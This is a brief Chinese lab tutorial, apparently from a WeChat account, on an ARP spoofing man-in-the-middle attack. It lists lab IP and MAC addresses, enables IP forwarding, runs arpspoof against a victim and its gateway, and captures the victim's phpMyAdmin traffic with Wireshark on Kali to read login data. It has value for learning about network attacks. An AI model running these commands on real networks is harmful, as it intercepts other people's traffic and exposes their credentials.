服务器：192.168.1.101  上面有http服务可以打开phpmyadmin

受害机：192.168.1.100  MAC：40-E2-30-D1-F1-D7  网关:192.168.1.1

***机：192.168.1.103  MAC：00-0c-29-e9-c8-fe  网关：192.168.1.1

网关：192.168.1.1     MAC：bc-46-99-72-dd-48

正常情况下如下图所示：

开启流量转发echo 1 > /proc/sys/net/ipv4/ip_forward

开始毒化arpspoof -t 192.168.1.100 192.168.1.1 -i eth0

毒化成功：***机和网关的MAC地址一样

在kali里开启wireshark抓包

受害机访问服务器：http://192.168.1.101/phpMyAdmin/

分析数据包，找到对应的数据，

---

微信公众号